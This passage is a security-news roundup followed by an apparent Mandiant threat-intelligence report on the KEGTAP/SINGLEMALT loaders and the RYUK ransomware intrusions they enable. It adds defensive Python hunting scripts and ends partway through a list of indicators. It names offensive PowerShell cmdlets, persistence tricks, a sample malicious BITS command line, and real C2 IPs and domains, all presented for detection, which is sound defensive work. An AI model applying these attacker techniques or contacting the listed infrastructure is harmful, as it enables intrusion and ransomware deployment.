       BA lost 430,000 payment card details to hackers after a Magecart e-commerce skimming attack in 2018
      This data breach was a lesson in failing at PCI DSS compliance, with customer credit card details stolen due to a ‘Magecart’ payment card skimming script being injected onto the BA payment page. The attackers initially compromised the BA network through a third-party worker’s remote access (not MFA protected), gaining access to BA's Citrix environment. Once inside the BA network, the attackers were gifted privileged access after finding a domain admin account username and password in plaintext in a server folder. I understand investigators found the storage of payment cards in plaintext, including CVV numbers post-payment authorisation, which is never permitted under PCI DSS rules. Aside from the ICO fine and reputational damage, this breach is likely to have cost BA a small fortune in specialised PCI PFI digital forensic investigation work, a complete solution rebuild, and card brand penalties. The Visa Chief Enterprise Risk Officer once said ‘no compromised entity has yet been found to be in compliance with PCI DSS at the time of a breach’; I understand that statement still rings true today.

      The ICO didn't hold back in dishing out a massive DPA (GDPR) fine to the Marriott Hotels chain, to the tune of £18.4m, after a major data breach which affected up to 7 million UK guests. The ICO reported that UK citizens' names, contact information, and passport details were compromised in the cyber-attack. The ICO also said the company failed to put appropriate safeguards in place, but acknowledged it had since improved.

      Meanwhile, the UK NCSC released an advisory which repeated an earlier United States warning that Chinese Threat Actors are exploiting well-known software vulnerabilities. The advisory details 25 top vulnerabilities that are being exploited whilst offering mitigation advice. Many of the vulnerabilities allow attackers to gain access to a victim’s network by exploiting products directly connected to the internet. The NSA has also produced a nice infographic breaking the 25 vulnerabilities down by threat.


      Stay safe and secure.


        Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

        Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

        The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

        The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

        Email Campaign TTPs

        Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

        • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
        • This document contains an in-line link to a URL hosting a malware payload.
        • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
        • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

        Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

        • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
        • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
        • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
        • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


        Figure 1: Email containing internal references to target an organization’s name


        Figure 2: Google Docs PDF document containing a target organization’s logo

        Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

        Post-Compromise TTPs

        Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

        Establish Foothold

        Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

        Maintain Presence

        Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

        • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
          • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
        • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
        • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
        • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
        • In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

        Escalate Privileges

        The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

        • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
        • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
        • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.

        Reconnaissance

        The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Active Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

        • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
          • Get-GPPPassword
          • Invoke-AllChecks
          • Invoke-BloodHound
          • Invoke-EternalBlue
          • Invoke-FileFinder
          • Invoke-HostRecon
          • Invoke-Inveigh
          • Invoke-Kerberoast
          • Invoke-LoginPrompt
          • Invoke-mimikittenz
          • Invoke-ShareFinder
          • Invoke-UserHunter
        • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfig, findstr, and cmd.exe.
        • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
        • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
        • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt.
        • The actors used the Nltest command to list domain controllers.

        Lateral Movement

        Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

        • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
        • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
        • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

        Complete Mission

        Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

        • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
        • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
        • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
        • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

        Hunting Strategies

        If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

        • Isolate and perform a forensic review of any impacted systems.
        • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
        • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
        • Reset credentials for any user accounts associated with execution of the malware.
        • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
        • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc.) and move towards multi-factor authentication (MFA) as soon as possible.

        An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

        Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

        %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

        Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

        SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which triggers a failure event; the job's notification command line then runs the malware. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS jobs on a host, run the command bitsadmin /list.

        • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
        • Notify state may be set to Fail (Status 2).
        • FileList URL value may be set to the local host or a URL that does not exist.
        • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
        • The Retry Delay value will be set.
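A triage script for the five BITS markers listed above, added here as an example rather than Mandiant's tooling: it parses the text of bitsadmin /list /allusers /verbose (the labelled field layout it keys on is an assumption about the verbose format, and the sample output is constructed) and stacks the markers, since a single one such as a retry delay is common on legitimate jobs.

```python
"""Triage BITS jobs for the SINGLEMALT persistence pattern described above.

Added example, not Mandiant's tooling. It expects the text of
`bitsadmin /list /allusers /verbose` (a saved file, or the embedded sample)
and scores each job against the five markers from the text. The field
labels it keys on (DISPLAY, STATE, NOTIFICATION FLAGS, RETRY DELAY,
JOB FILES, NOTIFICATION COMMAND LINE) are an assumption about the verbose
output format; SAMPLE_OUTPUT below is constructed.
"""
import re
import sys
from urllib.parse import urlparse

GENERIC_NAMES = {"adobe update", "system autoupdate"}   # names given in the text
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
FAILED_STATES = {"ERROR", "TRANSIENT_ERROR"}
BG_NOTIFY_JOB_ERROR = 0x2        # "notify on failure" bit, the "Status 2" above

# Labels bitsadmin prints, longest first so "JOB FILES" wins over "FILES".
LABELS = sorted([
    "GUID", "DISPLAY", "TYPE", "STATE", "OWNER", "PRIORITY", "FILES", "BYTES",
    "NOTIFY INTERFACE", "NOTIFICATION FLAGS", "RETRY DELAY",
    "NO PROGRESS TIMEOUT", "ERROR COUNT", "JOB FILES",
    "NOTIFICATION COMMAND LINE", "NOTIFICATION COMMAND LINE (PARAMETERS)",
], key=len, reverse=True)
LABEL_RE = re.compile(r"\b(" + "|".join(map(re.escape, LABELS)) + r"):")


def parse_jobs(text):
    """Split verbose bitsadmin output into one {label: value} dict per job."""
    jobs = []
    for block in re.split(r"(?m)^(?=GUID:)", text):
        if not block.startswith("GUID:"):
            continue
        parts = LABEL_RE.split(block)   # [prefix, label, value, label, value, ...]
        jobs.append({parts[i]: parts[i + 1].strip()
                     for i in range(1, len(parts) - 1, 2)})
    return jobs


def triage_job(job):
    """Return the list of SINGLEMALT markers a single job exhibits."""
    reasons = []
    if job.get("DISPLAY", "").lower() in GENERIC_NAMES:
        reasons.append("generic display name")
    if int(job.get("NOTIFICATION FLAGS") or 0) & BG_NOTIFY_JOB_ERROR:
        reasons.append("notify-on-failure flag set")
    if job.get("RETRY DELAY", "").isdigit():
        reasons.append("retry delay set")
    url = re.search(r"https?://\S+", job.get("JOB FILES", ""))
    host = urlparse(url.group(0)).hostname if url else None
    if host in LOCAL_HOSTS or job.get("STATE") in FAILED_STATES:
        reasons.append("download target is the local host or is failing")
    cmd = job.get("NOTIFICATION COMMAND LINE", "")
    if re.search(r"\.exe\b|\bmove\b|\bstart\b", cmd, re.IGNORECASE):
        reasons.append("notification command moves/starts a file")
    return reasons


def triage(text, threshold=3):
    """Score every job; a job is suspicious when it stacks >= threshold markers."""
    results = []
    for job in parse_jobs(text):
        reasons = triage_job(job)
        results.append({"guid": job.get("GUID"), "display": job.get("DISPLAY"),
                        "reasons": reasons, "suspicious": len(reasons) >= threshold})
    return results


# Constructed sample: one job shaped like SINGLEMALT persistence, one benign job.
SAMPLE_OUTPUT = r"""
GUID: {7C3E1F2A-5B64-4D1E-9A7F-000000000001} DISPLAY: Adobe Update
TYPE: DOWNLOAD STATE: TRANSIENT_ERROR OWNER: CORP\jdoe
PRIORITY: NORMAL FILES: 0 / 1 BYTES: 0 / UNKNOWN
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 2
RETRY DELAY: 60 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 12
JOB FILES:
        0 / UNKNOWN WORKING http://127.0.0.1/update.png -> C:\Users\jdoe\AppData\Local\Temp\update.png
NOTIFICATION COMMAND LINE: cmd.exe /c move C:\Users\jdoe\AppData\Roaming\svc\x.dat C:\Users\jdoe\AppData\Roaming\svc\x.exe && start C:\Users\jdoe\AppData\Roaming\svc\x.exe
NOTIFICATION COMMAND LINE (PARAMETERS): NULL
GUID: {1A2B3C4D-0000-0000-0000-000000000002} DISPLAY: MicrosoftMapsUpdate
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: NT AUTHORITY\SYSTEM
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 20480 / 20480
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 0
RETRY DELAY: 600 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 0
JOB FILES:
        20480 / 20480 WORKING https://download.example.com/maps.cab -> C:\ProgramData\maps.cab
NOTIFICATION COMMAND LINE: NULL
NOTIFICATION COMMAND LINE (PARAMETERS): NULL
"""

if __name__ == "__main__":
    # Pass a saved bitsadmin output file as the first argument, else use the sample.
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_OUTPUT
    for r in triage(text):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['guid']} {r['display']!r}: {', '.join(r['reasons']) or '-'}")
```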

        WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

        Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

        Value: Path to the backdoor

        Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

        The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

        • Named scheduled tasks associated with ANCHOR persistence may follow the pattern <Random directory within %APPDATA%> autoupdate#<random number>.
        • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

        Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.
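The task-name and SysWOW64 checks above, together with the creation-timestamp stacking, as an added example that is not Mandiant's tooling; the task list and directory listing are constructed, and the live-host helper assumes st_ctime is the creation time (true on Windows).

```python
"""Hunt for the ANCHOR persistence artifacts described above.

Added example, not Mandiant's tooling. It applies the two low-fidelity
patterns from the text (named tasks of the form '<dir> autoupdate#<n>'
and '<8 lowercase chars>.exe' in SysWOW64) and stacks SysWOW64 creation
dates so that files created on days the directory was otherwise untouched
stand out. The task and file listings below are constructed sample data;
scan_syswow64() is a helper for a live host and assumes st_ctime is the
creation time, which holds on Windows.
"""
import os
import re
from collections import Counter
from datetime import datetime

TASK_NAME_RE = re.compile(r"^.+ autoupdate#\d+$")
RANDOM_EXE_RE = re.compile(r"^[a-z]{8}\.exe$")


def suspicious_tasks(task_names):
    """Named tasks matching the ANCHOR pattern plus every unnamed task (""),
    since the text says all unnamed tasks need review."""
    return [t for t in task_names if t == "" or TASK_NAME_RE.match(t)]


def stack_by_day(files):
    """files: list of (name, created datetime) -> {date: file count}."""
    return Counter(created.date() for _, created in files)


def suspicious_files(files, quiet_day_share=0.02):
    """Flag entries matching the name pattern or created on a 'quiet' day,
    i.e. a day holding no more than quiet_day_share of the directory. Almost
    everything in a static directory shares a few install/update days, so a
    day with one or two new files is worth pulling for review. Both checks
    are low fidelity on their own: a hit on both is the interesting case."""
    by_day = stack_by_day(files)
    quiet_max = max(1, int(len(files) * quiet_day_share))
    hits = []
    for name, created in files:
        reasons = []
        if RANDOM_EXE_RE.match(name.lower()):
            reasons.append("8-lowercase-char .exe name")
        if by_day[created.date()] <= quiet_max:
            reasons.append(f"created on quiet day {created.date()}")
        if reasons:
            hits.append((name, reasons))
    return hits


def scan_syswow64(path=r"C:\Windows\SysWOW64"):
    """Live-host helper: (name, creation time) for each file in the directory."""
    with os.scandir(path) as entries:
        return [(e.name, datetime.fromtimestamp(e.stat().st_ctime))
                for e in entries if e.is_file()]


# Constructed sample data.
SAMPLE_TASKS = [r"\Microsoft\Windows\Defrag\ScheduledDefrag", "",
                "xkcdqwer autoupdate#38201", "Adobe Acrobat Update Task"]
BASELINE = datetime(2020, 6, 15, 9, 0)
SAMPLE_FILES = [(f"lib{i:02d}.dll", BASELINE) for i in range(97)]
SAMPLE_FILES += [("ntdsutil.exe", BASELINE),                         # legitimate binary, name-only hit
                 ("qwertyui.exe", datetime(2020, 10, 20, 3, 14)),     # both markers
                 ("vcruntime140.dll", datetime(2020, 10, 20, 3, 15))]  # quiet day only

if __name__ == "__main__":
    print("tasks to review:", suspicious_tasks(SAMPLE_TASKS))
    for name, reasons in suspicious_files(SAMPLE_FILES):
        print(f"{name:20} {'; '.join(reasons)}")
```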

        Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

        The following are additional strategies that may aid in identifying associated activity:

        • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
        • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
        • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.
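The proxy-log review from the first bullet above, as an added example that is not Mandiant's tooling: it flags requests to file-storage or collaboration services whose Referer is a Google Docs document. The log lines are constructed in a simple space-separated layout, and STORAGE_HOSTS is an assumed starter list rather than one from the text.

```python
"""Flag proxy requests to file-storage / collaboration services that carry a
Google Docs document as Referer, the pattern described above.

Added example, not Mandiant's tooling. Log lines are constructed in a
simple space-separated format: timestamp client method url status "referer";
adapt parse_line() to your proxy's format. STORAGE_HOSTS is an assumed
starter list of service domains, not one taken from the text.
"""
import re
from urllib.parse import urlparse

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
DOCS_HOST = "docs.google.com"
STORAGE_HOSTS = {  # assumed starter list; extend for your environment
    "dropbox.com", "dl.dropboxusercontent.com", "onedrive.live.com",
    "1drv.ms", "app.box.com", "basecamp.com", "slack.com", "mega.nz",
}


def host_in(host, suffixes):
    """True when host equals, or is a subdomain of, any entry in suffixes."""
    return host is not None and any(host == s or host.endswith("." + s) for s in suffixes)


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, referer = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "referer": referer}


def docs_referred_downloads(lines):
    """Return (client, url, referer) for requests whose Referer is a Google
    Docs document and whose destination is a storage/collaboration service."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        if (urlparse(rec["referer"]).hostname == DOCS_HOST
                and host_in(urlparse(rec["url"]).hostname, STORAGE_HOSTS)):
            hits.append((rec["client"], rec["url"], rec["referer"]))
    return hits


# Constructed sample: a document view, two follow-on fetches with the document
# as Referer (the hits), and an unrelated direct visit with no Referer.
SAMPLE_LOG = [
    '2020-10-21T14:02:11Z 10.1.2.33 GET https://docs.google.com/document/d/EXAMPLEID/edit 200 "https://mail.example.com/"',
    '2020-10-21T14:02:25Z 10.1.2.33 GET https://www.dropbox.com/s/EXAMPLE/agreement.zip?dl=1 302 "https://docs.google.com/document/d/EXAMPLEID/edit"',
    '2020-10-21T14:02:26Z 10.1.2.33 GET https://dl.dropboxusercontent.com/s/EXAMPLE/agreement.zip 200 "https://docs.google.com/document/d/EXAMPLEID/edit"',
    '2020-10-21T14:05:40Z 10.1.2.57 GET https://app.box.com/s/EXAMPLE 200 ""',
]

if __name__ == "__main__":
    for client, url, referer in docs_referred_downloads(SAMPLE_LOG):
        print(f"{client} fetched {url} with Referer {referer}")
```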

        Hardening Strategies

        The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

        • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. Where possible, migrate to MSAs and gMSAs for automated rotation.
        • Prevent the usage of privileged accounts for lateral movement. Use GPOs to prevent privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins. Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
        • Block internet access for servers where possible. Often there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
        • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that does not have a business categorization.
        • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

        For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

        Campaign Indicators

        Sample Email Subjects / Patterns

        • <(first|last)-name>: Important Information
        • <Company Name>
        • <Company Name> complaint
        • <(first|last)-name>
        • <(first|last)-name>
        • Agreement cancellation message
        • Agreement cancellation notice
        • Agreement cancellation notification
        • Agreement cancellation reminder
        • Agreement suspension message
        • Agreement suspension notice
        • Agreement suspension notification
        • Agreement suspension reminder
        • Arrangement cancellation message
        • Arrangement cancellation notice
        • Arrangement cancellation notification
        • Arrangement cancellation reminder
        • Arrangement suspension message
        • Arrangement suspension notice
        • Arrangement suspension notification
        • Arrangement suspension reminder
        • Contract cancellation message
        • Contract cancellation notice
        • Contract cancellation notification
        • Contract cancellation reminder
        • Contract suspension message
        • Contract suspension notice
        • Contract suspension notification
        • Contract suspension reminder
        • debit confirmation
        • FW: <Name> Annual Bonus Report is Ready
        • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
        • RE: <(first|last)-name>
        • RE: <(first|last)-name>: Your Payslip for October
        • RE: <Company Name> - my visit
        • RE: <Company Name> Employee Survey
        • RE: <Company Name> office
        • RE: <Name> about complaint
        • RE: <Name> bonus
        • RE: <Name> termination list
        • RE: <Name>
        • RE: <Company Name> office
        • RE: <(first|last)-name>
        • RE: <(first|last)-name> <(first|last)-name>: complaint
        • RE: <(first|last)-name>: Subpoena
        • RE: <(first|last)-name>
        • RE: <(first|last)-name>: Your Payslip for September
        • RE: about complaint
        • RE: Adopted Filer Forms
        • RE: Business hours adjustment
        • RE: Business hours realignment
        • RE: Business hours rearrangement
        • RE: Business hours restructuring
        • RE: Business schedule adjustment
        • RE: Business schedule realignment
        • RE: Business schedule rearrangement
        • RE: Business schedule restructuring
        • RE: call me
        • RE: changes
        • RE: complaint
        • RE: Complaint in <Company Name>.
        • RE: Complaint on <Name>
        • RE: customer request
        • RE: debit confirmation
        • RE: document copy
        • RE: documents list
        • RE: Edgar Filer forms renovations
        • RE: employee bonuses
        • RE: Filer Forms adaptations
        • RE: my call
        • RE: New filer form types
        • RE: office
        • RE: our meeting
        • RE: Payroll Register
        • RE: report confirmation
        • RE: situation
        • RE: Subpoena
        • RE: termination
        • RE: till 2 pm
        • RE: Urgent <Company Name> Employee Internal Survey
        • RE: visit
        • RE: what about your opinion?
        • RE: what time?
        • RE: why
        • RE: why this debit
        • RE: Working schedule adjustment
        • RE: Working schedule realignment
        • RE: Working schedule rearrangement
        • RE: Working schedule restructuring
        • RE: Your Payslip for September

        Example Malware Family MD5s

        • KEGTAP
          • df00d1192451268c31c1f8568d1ff472
        • BEERBOT
          • 6c6a2bfa5846fab374b2b97e65095ec9
        • SINGLEMALT
          • 37aa5690094cb6d638d0f13851be4246
        • STILLBOT
          • 3176c4a2755ae00f4fffe079608c7b25
        • WINEKEY
          • 9301564bdd572b0773f105287d8837c4
        • CORKBOT
          • 0796f1c1ea0a142fc1eb7109a44c86cb

        Code Signing Certificate CNs

        • ARTBUD RADOM SP Z O O
        • BESPOKE SOFTWARE SOLUTIONS LIMITED
        • Best Fud, OOO
        • BlueMarble GmbH
        • CHOO FSP, LLC
        • Company Megacom SP Z O O
        • ESTELLA, OOO
        • EXON RENTAL SP Z O O
        • Geksan LLC
        • GLOBAL PARK HORIZON SP Z O O
        • Infinite Programming Limited
        • James LTH d.o.o.
        • Logika OOO
        • MADAS d.o.o.
        • MUSTER PLUS SP Z O O
        • NEEDCODE SP Z O O
        • Nordkod LLC
        • NOSOV SP Z O O
        • OOO MEP
        • PLAN CORP PTY LTD
        • REGION TOURISM LLC
        • RESURS-RM OOO
        • Retalit LLC
        • Rumikon LLC
        • SNAB-RESURS, OOO
        • TARAT d.o.o.
        • TES LOGISTIKA d.o.o.
        • VAS CO PTY LTD
        • VB CORPORATE PTY. LTD.
        • VITA-DE d.o.o.

        UNC1878 Indicators

        A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

        BEACON C2s


        3/9/20

        194.26.29.230:443

        CN=secondserviceupdater[.]com

        c30a4809c9a77cfc09314a63f7055bf7

        3/9/20

        194.26.29.229:443

        CN=firstserviceupdater[.]com

        bc86a3087f238014b6c3a09c2dc3df42

        3/9/20

        194.26.29.232:443

        CN=fourthserviceupdater[.]com

        3dc6d12c56cc79b0e3e8cd7b8a9c320b

        3/9/20

        194.26.29.234:443

        CN=sixthserviceupdater[.]com

        951e29ee8152c1e7f63e8ccb6b7031c1

        3/9/20

        194.26.29.235:443

        CN=seventhserviceupdater[.]com

        abe1ce0f83459a7fe9c72839fc46330b

        3/9/20

        194.26.29.236:443

        CN=eighthserviceupdater[.]com

        c7a539cffdd230a4ac9a4754c2c68f12

        3/9/20

        194.26.29.237:443

        CN=ninethserviceupdater[.]com

        1d1f7bf2c0eec7a3a0221fd473ddbafc

        3/9/20

        194.26.29.225:443

        CN=seventeenthservicehelper[.]com

        6b1e0621f4d891b8575a229384d0732d

        3/9/20

        194.26.29.227:443

        CN=nineteenthservicehelper[.]com

        38756ffb8f2962f6071e770637a2d962

        3/9/20

        194.26.29.242:443

        CN=thirdservicehelper[.]com

        3b911032d08ff4cb156c064bc272d935

        3/9/20

        194.26.29.244:443

        CN=tenthservicehelper[.]com

        a2d9b382fe32b0139197258e3e2925c4

        3/9/20

        194.26.29.226:443

        CN=eighteenthservicehelper[.]com

        4acbca8efccafd92da9006d0cc91b264

        3/9/20

        194.26.29.243:443

        CN=ninthservicehelper[.]com

        0760ab4a6ed9a124aabb8c377beead54

        3/9/20

        194.26.29.201:443

        CN=secondservicehelper[.]com

        d8a8d0ad9226e3c968c58b5d2324d899

        3/9/20

        194.26.29.202:443

        CN=thirdservicehelper[.]com

